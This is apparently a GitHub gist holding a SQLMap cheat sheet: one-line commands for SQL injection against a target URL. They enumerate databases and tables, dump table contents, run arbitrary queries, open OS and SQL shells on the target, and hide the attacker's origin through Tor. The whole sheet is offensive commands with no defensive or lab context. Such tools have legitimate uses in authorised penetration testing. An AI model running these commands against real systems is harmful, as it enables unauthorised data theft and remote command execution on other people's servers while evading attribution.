Skip to content

Instantly share code, notes, and snippets.

@XaviTorello
Forked from jkullick/sqlmap-cheat-sheet.md
Created December 15, 2017 17:19
Show Gist options
  • Save XaviTorello/20850482caea34b5c46ec6cce81f4dc5 to your computer and use it in GitHub Desktop.
Save XaviTorello/20850482caea34b5c46ec6cce81f4dc5 to your computer and use it in GitHub Desktop.
SQLMap Cheat Sheet
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell

# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell

# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment